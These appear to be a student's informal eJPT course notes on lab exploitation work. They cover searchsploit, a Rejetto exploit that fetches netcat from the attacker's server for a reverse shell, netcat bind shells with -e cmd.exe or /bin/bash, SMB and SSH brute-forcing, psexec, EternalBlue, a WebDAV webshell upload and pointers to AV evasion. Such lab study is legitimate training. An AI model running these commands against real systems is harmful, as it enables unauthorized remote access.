EJPT9:

Host & Network Penetration Testing: Exploitation:

BANNER GRABBING(lab):
using banner grabbing to identify the services running o the target it has a ssh
lab whic is already done previously.
using nmap for banner grabbing:
nmap -sV --script=banner ip

From now if the vedio or ;lba has alreday done will skip and yea inf anything new
comes will write will skip nothing.
:)

Exploits:
THe first part was about searching the publicaly avilable exploits using eploitdb
and being careful to use verified exploits as sometimes the exploits may have
malicious code indside them and we cam also use google dork for searching for
exploits.
A useful webiste for gettinh new about exploits packetstorm

SEARCHING EXPLOITS WITH SEARCHSPLOIT:

This section was about using searchsploit how to copy exploits from it in our
current directory etc a good documentation on it:
to copy exploit from searhsploit searhsploit -m exploit number
https://blog.certcube.com/searchsploit-cheat-sheet/#:~:text=Searchsploit%20an
%20exploit%20search%20tool,out%20copy%20of%20the%20repository.

FIXING EXPLOITS:

We will be xploiting a windows vulnerable http server but this time using manual
approach.
To do we will use searchsploit:
the exploit we are going to use if rejjeto http vuln .
Let's copy the exploit from searchsploit to our root directory by searchsploit -m
exploit number
Then let's see what all is needed to configure etc.
We need to configure ip address to our local ip address and port no to port we will
use our netcat listener to .
For it to work perfectly we need to host our local machine on python http server
and and during exploitation the in the script we have asked to hots netcat script
on the python server so we do so copy the netcat script from the directory it is to
our home directory and also start a netcat listner on any port ny nc -nvlp port no
then we will will start our server and use the command python exploit.py ip python
server port no and it will download the netcat executable from our loclamachine
which it will use to conncet to our netcat connection we started earlier and give
us a rev shell done.

SHELLS:
NETCAT FUNDAMENTALS(lab):

this lab is about netcat using it put our files into target system inetracting
with target system downloading file to target using how to host using netcat banner
grabbing etc.
to connect tcp port nc -nv ip port
for udp
nc -nvu ip port
BIND SHELL():
It's about bind shell and executing tht onthe target system uisng netcat .
For executing nc bind shell we will transfer our nc.exe to windows by hosting
server on linux
We have transfered the nc.exe to the windows machine now we will use it to host a
bind shell nc.exe -nvlp 1234 -e cmd.exe
now connect to kalimachine using the command nc -nv ip port
if we wnna do opposite connect kali using windows
do
nc -nvlp -e /bin/bash
and connect on windows system using nc.exe -nv ip port

FRAMEWORKS:
MSF FRAMEWORK(lab):

Found alogin page for proccess maker admin page logged in using default creds and
serached in msf for modules found one php module rce used it got rce and got flag
from machine boom done .

POWESHELL EMPIRE(no lab):

---

WINDOWS BALCKBOX:
This is a blacckbox testing lab and it's like divided into different parts one
section for enumeration one for ssh exploitation one for smb exploitation and all
il try to solve all labs without vedio or walkthrough let's see
Inscanned the server and found many open ports first i did was exploiting ftp
server by using a bruteforce attack and got password for administrator.
Also found a smb server openssh jenkins and oracle fish let's exploit further.Found
a openssh server too lets's search for it's exploits using searchsploit and found a
username enumeration nothing much we will use ssh bruteforce let's see using hydra
for that.
we got a user vagrant and password vagrant let's use it and login ..
We loggedf in found nothing importnat let's move froward serach something else
Let's exploit smb :
bruteforcing smb and found the pass for aministrator vagrant.
Lets use enum4linux to enumerate user and bruteforce thier pass also .
Now tht we have creds we can use psexec to gain remote access.
Got stuck here forgot usage of psexec :(
So we will have to copy psexec to our current directory and prvide it executable
permisssions
cp /usr/share/psexec.py /root/Desktop and then chmod +x psexec.py
usage:
python3 psexec.py administrator@ip
and logged in
We can also use psexec module if don't want this much hassle lol
use exploit/windows/smb/psexec

Next is mysql db eumeration :

btw these blackboxes should be in type of blackbox one lab noly not diffrent parts
it should be like blackboes were in prev ejptv1 course much better.
Let's exploit mysql
Also blackbox previously were much much better nd harder :( din't expect this do
thm and htb recommended.
We will first try bruteforcing the creds using msf
And root has no password like anonynous login logged in and finished the lab also
when i saw the vedio i remeberred that we i also dicovered a php myadmin directory
which we weren't able to access because it was allowed only for local hosts so we
ill just use the eternal blue and edit the apache conf file
to do so lets find the apache.conf file
we aren't allowed to modify within the system so we woll just download it and
update and upload to the session and msf will replace the file with our uploaded
file.
we can find some juicy info abt wordpress here maybe helpful for exam
this dir: C:\wamp\www\wordpress
now the apache conf file will get here :
c:\wamp\alias\phpmyadmin.conf
and edit it the ip and use all so it will allow everyone to access it.
And to get it updated we will restart the apache service
net stop wampapache
net start wampapache
And done we can access the php myadmin panel.

LINUX BLACK BOX :

Let's start this is similiar to prev io mena diffrent parts .
We will first do the scanning finding open port then doing
Nmap scan reveals tht we have many services riunning such as openssh ,vsftd ,
telnet , smaba, mysql, postgresql,a pache tomcat.
LEt's enumerate strating with smaba :
using enum4linux foe getiing the users nd shares
we got list for them
i tried bruteforcing but no luck et's try ftp
also i found phpmyadin login page and apache tomcat also..
With little bit of seraching i found webdav directory
and used the webdav upload php msf module to get a msf shell
A linux machine rce will try to find if anything intersting is in there
nothing useful saw all the config files nothung much there now trying ftp
bruteforce din't work but we do have a anonymous login let's login and see wht
intresting in it .
Andn found a vsftpd module but it din't work as it's patched i tried bruteforcing
again with tyhe unix_users wordlist and this time found one acc called service
account let's login that and see if can do something like upload download etc.
We can upload files so ye let's get metrerprter session .
ope the ftp session and upload our web php webshell in the /var/www/dav directory
and open it using web browser anc get our session on netcat.

Now we will exploit php had to see solution for this one it's easy ik ye but was
confused for something :(
using the php msf module for cgi ijection .
and get meterpreter shell .
We can also use this msf oduke to exploit samaba use
exploit/multi/samba/usermap_script.
Done linux blackbox.

OBFUSCATION(no lab):

AV EVASION WITH SHELTER:

OBUSCATION WITH POWERSHELL CODE:

Obfuscating msfvenom shell with powershell scripts use your own sources or this
https://medium.com/@SecureTacticsTS/simple-but-effective-powershell-obfuscation-
techniques-b38900d8f7dd